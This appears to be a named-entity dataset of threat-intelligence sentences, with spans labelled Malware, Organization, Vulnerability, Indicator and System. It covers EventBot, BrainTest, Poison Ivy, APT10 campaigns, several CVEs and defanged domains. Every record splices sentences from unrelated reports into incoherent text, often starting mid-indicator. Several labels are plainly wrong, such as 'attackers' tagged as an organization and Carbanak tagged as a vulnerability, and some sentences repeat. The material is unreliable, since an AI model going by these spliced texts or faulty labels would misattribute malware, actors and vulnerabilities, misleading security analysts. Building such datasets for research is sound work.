{"text": "The IP address of both ora.carlaarrabitoarchitetto [ . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": [{"start": 23, "end": 54, "label": "Indicator"}, {"start": 76, "end": 93, "label": "Malware"}, {"start": 186, "end": 192, "label": "System"}, {"start": 225, "end": 242, "label": "Malware"}]}
{"text": "] com and ora.studiolegalebasili [ . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": [{"start": 10, "end": 36, "label": "Indicator"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 211, "end": 221, "label": "Malware"}, {"start": 314, "end": 335, "label": "Indicator"}]}
{"text": "] com , 31.214.157 [ . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 36, "label": "Malware"}, {"start": 116, "end": 123, "label": "Malware"}]}
{"text": "] 6 , was previously hosting the domain next.nextuptravel [ . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": [{"start": 33, "end": 61, "label": "Indicator"}, {"start": 187, "end": 200, "label": "Malware"}, {"start": 204, "end": 219, "label": "Malware"}, {"start": 222, "end": 232, "label": "Malware"}, {"start": 266, "end": 279, "label": "System"}, {"start": 280, "end": 284, "label": "Malware"}]}
{"text": "] com . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": [{"start": 12, "end": 16, "label": "Malware"}, {"start": 17, "end": 29, "label": "Malware"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 176, "end": 190, "label": "Organization"}, {"start": 195, "end": 206, "label": "Organization"}]}
{"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": [{"start": 23, "end": 42, "label": "Malware"}, {"start": 108, "end": 121, "label": "Malware"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Organization"}, {"start": 459, "end": 467, "label": "Organization"}, {"start": 501, "end": 505, "label": "Malware"}]}
{"text": "EventBot VirusTotal search for the malicious IP address VirusTotal search for the malicious IP address . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 293, "end": 297, "label": "Malware"}, {"start": 300, "end": 309, "label": "Organization"}, {"start": 319, "end": 322, "label": "Malware"}, {"start": 337, "end": 354, "label": "Organization"}]}
{"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information , is able to hijack transactions . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 311, "end": 329, "label": "Malware"}, {"start": 332, "end": 336, "label": "Malware"}, {"start": 410, "end": 425, "label": "Organization"}, {"start": 428, "end": 447, "label": "Organization"}, {"start": 450, "end": 469, "label": "Organization"}, {"start": 540, "end": 549, "label": "Organization"}, {"start": 557, "end": 565, "label": "Vulnerability"}, {"start": 598, "end": 602, "label": "Malware"}]}
{"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": [{"start": 168, "end": 185, "label": "Malware"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 211, "end": 229, "label": "Malware"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 295, "end": 299, "label": "Malware"}, {"start": 321, "end": 329, "label": "Vulnerability"}, {"start": 330, "end": 337, "label": "Vulnerability"}]}
{"text": "This information can give the attacker access to personal and business bank accounts , personal and business data , and more . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering .", "spans": [{"start": 127, "end": 139, "label": "Organization"}, {"start": 160, "end": 178, "label": "Malware"}, {"start": 382, "end": 392, "label": "Malware"}, {"start": 412, "end": 421, "label": "Organization"}, {"start": 559, "end": 577, "label": "Organization"}]}
{"text": "Letting an attacker get access to this kind of data can have severe consequences . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . Attackers can point and click their ACT through a compromised network and exfiltrate data .", "spans": [{"start": 106, "end": 119, "label": "Vulnerability"}, {"start": 185, "end": 194, "label": "Organization"}]}
{"text": "60 % of devices containing or accessing enterprise data are mobile . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time\u2014attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": [{"start": 69, "end": 84, "label": "Organization"}, {"start": 97, "end": 110, "label": "Organization"}, {"start": 232, "end": 248, "label": "Vulnerability"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 277, "end": 281, "label": "Malware"}, {"start": 449, "end": 473, "label": "Malware"}]}
{"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": [{"start": 326, "end": 347, "label": "Vulnerability"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 423, "end": 434, "label": "Organization"}, {"start": 527, "end": 555, "label": "Organization"}]}
{"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 114, "end": 145, "label": "System"}, {"start": 310, "end": 316, "label": "Organization"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 408, "end": 413, "label": "Organization"}]}
{"text": "Much like we have seen in recent months , anyone can be impacted by a mobile device attack . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally .", "spans": [{"start": 164, "end": 177, "label": "Vulnerability"}, {"start": 193, "end": 208, "label": "Malware"}, {"start": 294, "end": 322, "label": "Organization"}, {"start": 325, "end": 329, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 437, "end": 441, "label": "Organization"}]}
{"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": [{"start": 153, "end": 168, "label": "Malware"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 277, "end": 302, "label": "Malware"}, {"start": 316, "end": 323, "label": "Organization"}, {"start": 450, "end": 456, "label": "Organization"}, {"start": 469, "end": 474, "label": "Organization"}]}
{"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": [{"start": 195, "end": 214, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 265, "end": 282, "label": "System"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 306, "end": 311, "label": "Malware"}, {"start": 312, "end": 319, "label": "Malware"}]}
{"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user . FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 18, "end": 43, "label": "System"}, {"start": 44, "end": 52, "label": "Malware"}, {"start": 121, "end": 128, "label": "Organization"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 177, "end": 188, "label": "Organization"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 371, "end": 384, "label": "Vulnerability"}, {"start": 387, "end": 393, "label": "Organization"}, {"start": 398, "end": 409, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]}
{"text": "With Cybereason Mobile , analysts can address mobile threats in the same platform as traditional endpoint threats , all as part of one incident . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 5, "end": 22, "label": "System"}, {"start": 158, "end": 175, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 345, "end": 352, "label": "Malware"}, {"start": 355, "end": 360, "label": "Organization"}, {"start": 459, "end": 471, "label": "Malware"}, {"start": 493, "end": 502, "label": "Organization"}]}
{"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": [{"start": 150, "end": 158, "label": "Malware"}, {"start": 165, "end": 202, "label": "Vulnerability"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}, {"start": 297, "end": 301, "label": "Organization"}, {"start": 305, "end": 316, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}]}
{"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions . It is possible that CVE-2017-8759 was being used by additional actors . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 26, "end": 34, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 276, "end": 283, "label": "Organization"}, {"start": 341, "end": 366, "label": "Malware"}, {"start": 385, "end": 397, "label": "Organization"}, {"start": 429, "end": 437, "label": "Malware"}, {"start": 438, "end": 445, "label": "Malware"}]}
{"text": "CONCLUSION In this research , the Nocturnus team has dissected a rapidly evolving Android malware in the making . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware .", "spans": [{"start": 34, "end": 43, "label": "Organization"}, {"start": 82, "end": 89, "label": "Malware"}, {"start": 134, "end": 145, "label": "Vulnerability"}, {"start": 157, "end": 167, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 360, "end": 367, "label": "Organization"}, {"start": 425, "end": 450, "label": "Malware"}, {"start": 469, "end": 480, "label": "Organization"}, {"start": 512, "end": 520, "label": "Malware"}, {"start": 521, "end": 528, "label": "Malware"}]}
{"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": [{"start": 24, "end": 31, "label": "System"}, {"start": 157, "end": 169, "label": "System"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 265, "end": 285, "label": "System"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 460, "end": 470, "label": "Organization"}, {"start": 475, "end": 500, "label": "Organization"}, {"start": 614, "end": 618, "label": "Organization"}]}
{"text": "With each new version , the malware adds new features like dynamic library loading , encryption , and adjustments to different locales and manufacturers . The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . The research and ongoing tracking of APT10 by both PwC UK and BAE .", "spans": [{"start": 200, "end": 212, "label": "Vulnerability"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 327, "end": 333, "label": "Organization"}, {"start": 338, "end": 341, "label": "Organization"}]}
{"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware . Some hackers even went onto use the Cisco exploits in the wild . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 202, "end": 216, "label": "Vulnerability"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 381, "end": 391, "label": "Organization"}, {"start": 396, "end": 421, "label": "Organization"}, {"start": 535, "end": 539, "label": "Organization"}]}
{"text": "Cybereason classifies EventBot as a mobile banking trojan and infostealer based on the stealing features discussed in this research . DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . PwC UK has been engaged in supporting investigations linked to APT10 compromises .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 134, "end": 146, "label": "System"}, {"start": 215, "end": 224, "label": "System"}, {"start": 330, "end": 345, "label": "System"}, {"start": 350, "end": 364, "label": "System"}, {"start": 369, "end": 379, "label": "System"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 445, "end": 450, "label": "Organization"}]}
{"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications . In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": [{"start": 187, "end": 209, "label": "Vulnerability"}, {"start": 304, "end": 331, "label": "Malware"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 393, "end": 398, "label": "Organization"}]}
{"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development . On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis .", "spans": [{"start": 61, "end": 69, "label": "Malware"}, {"start": 363, "end": 366, "label": "Organization"}, {"start": 391, "end": 402, "label": "Vulnerability"}]}
{"text": "The Cybereason Nocturnus team will continue to monitor EventBot \u2019 s development . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 55, "end": 63, "label": "Malware"}, {"start": 110, "end": 130, "label": "Organization"}, {"start": 172, "end": 205, "label": "Malware"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 449, "end": 454, "label": "Malware"}]}
{"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": [{"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 210, "end": 224, "label": "Malware"}, {"start": 291, "end": 298, "label": "Organization"}]}
{"text": "Naturally , this resulted in the introduction of malware for mobile platforms , especially Android devices , including Cerberus , Xhelper and the Anubis Banking Trojan . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions .", "spans": [{"start": 91, "end": 98, "label": "System"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 130, "end": 137, "label": "Malware"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 187, "end": 200, "label": "Organization"}, {"start": 233, "end": 251, "label": "Organization"}, {"start": 323, "end": 349, "label": "Vulnerability"}, {"start": 414, "end": 419, "label": "Organization"}, {"start": 459, "end": 463, "label": "Organization"}, {"start": 553, "end": 565, "label": "Organization"}]}
{"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 .", "spans": [{"start": 218, "end": 242, "label": "System"}, {"start": 255, "end": 263, "label": "System"}, {"start": 266, "end": 283, "label": "System"}, {"start": 377, "end": 390, "label": "Vulnerability"}, {"start": 418, "end": 422, "label": "Organization"}, {"start": 492, "end": 498, "label": "Organization"}, {"start": 507, "end": 512, "label": "Organization"}]}
{"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims .", "spans": [{"start": 33, "end": 50, "label": "System"}, {"start": 89, "end": 116, "label": "System"}, {"start": 254, "end": 264, "label": "System"}, {"start": 285, "end": 298, "label": "Malware"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 339, "end": 348, "label": "Vulnerability"}, {"start": 349, "end": 356, "label": "Vulnerability"}, {"start": 402, "end": 406, "label": "Organization"}, {"start": 419, "end": 424, "label": "Organization"}, {"start": 448, "end": 451, "label": "Malware"}, {"start": 503, "end": 510, "label": "Vulnerability"}]}
{"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console . The Word document usually exploits CVE-2012-0158 . This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": [{"start": 5, "end": 22, "label": "System"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 181, "end": 194, "label": "Vulnerability"}]}
{"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 12, "end": 36, "label": "System"}, {"start": 130, "end": 141, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 329, "end": 333, "label": "Organization"}]}
{"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 57, "end": 66, "label": "Malware"}, {"start": 91, "end": 102, "label": "System"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 139, "end": 161, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 229, "end": 231, "label": "System"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 326, "end": 345, "label": "Malware"}]}
{"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": [{"start": 69, "end": 80, "label": "System"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 282, "end": 291, "label": "Malware"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 488, "end": 492, "label": "Organization"}]}
{"text": "Check Point reached out to Google on September 10 , 2015 , and the app containing the malware was removed from Google Play on September 15 , 2015 . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 111, "end": 122, "label": "System"}, {"start": 188, "end": 205, "label": "Organization"}, {"start": 234, "end": 264, "label": "Malware"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 423, "end": 428, "label": "Organization"}, {"start": 565, "end": 575, "label": "Organization"}, {"start": 643, "end": 652, "label": "Organization"}]}
{"text": "Overview The malware was first detected on a Nexus 5 smartphone , and although the user attempted to remove the infected app , the malware reappeared on the same device shortly thereafter . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with the earliest known date of its activity being in December 2009 .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 236, "end": 251, "label": "System"}, {"start": 266, "end": 281, "label": "Malware"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 473, "end": 478, "label": "Organization"}, {"start": 541, "end": 551, "label": "Organization"}]}
{"text": "Our analysis of the malware shows it uses multiple , advanced techniques to avoid Google Play malware detection and to maintain persistency on target devices . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China .", "spans": [{"start": 82, "end": 93, "label": "System"}, {"start": 164, "end": 178, "label": "Malware"}, {"start": 208, "end": 223, "label": "Vulnerability"}, {"start": 310, "end": 315, "label": "Organization"}]}
{"text": "Once this malware was detected on a device , Mobile Threat Prevention adjusted security policies on the Mobile Device Management solution ( MobileIron ) managing the affected devices automatically , thereby blocking enterprise access from the infected devices . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient .", "spans": [{"start": 45, "end": 69, "label": "System"}, {"start": 290, "end": 310, "label": "Organization"}, {"start": 352, "end": 385, "label": "Malware"}, {"start": 405, "end": 418, "label": "Vulnerability"}, {"start": 490, "end": 499, "label": "Organization"}, {"start": 544, "end": 559, "label": "Malware"}]}
{"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it \u2019 s currently installing additional apps on infected devices . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 224, "end": 242, "label": "Organization"}, {"start": 314, "end": 340, "label": "Vulnerability"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 466, "end": 476, "label": "Malware"}, {"start": 480, "end": 485, "label": "Malware"}]}
{"text": "Disturbingly , the malware establishes a rootkit on the device , allowing it to download and execute any code a cybercriminal would want to run on a device . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": [{"start": 158, "end": 166, "label": "Organization"}, {"start": 240, "end": 260, "label": "Organization"}, {"start": 301, "end": 318, "label": "Vulnerability"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 435, "end": 438, "label": "Malware"}, {"start": 465, "end": 469, "label": "Organization"}]}
{"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": [{"start": 197, "end": 202, "label": "Organization"}, {"start": 276, "end": 296, "label": "Organization"}, {"start": 337, "end": 354, "label": "Vulnerability"}, {"start": 439, "end": 444, "label": "Organization"}, {"start": 496, "end": 504, "label": "Malware"}, {"start": 508, "end": 514, "label": "Malware"}, {"start": 533, "end": 557, "label": "Malware"}]}
{"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots .", "spans": [{"start": 50, "end": 59, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 184, "end": 198, "label": "System"}, {"start": 271, "end": 285, "label": "System"}, {"start": 376, "end": 384, "label": "Vulnerability"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 501, "end": 519, "label": "Organization"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 555, "end": 560, "label": "Organization"}, {"start": 616, "end": 631, "label": "Malware"}, {"start": 635, "end": 651, "label": "Malware"}]}
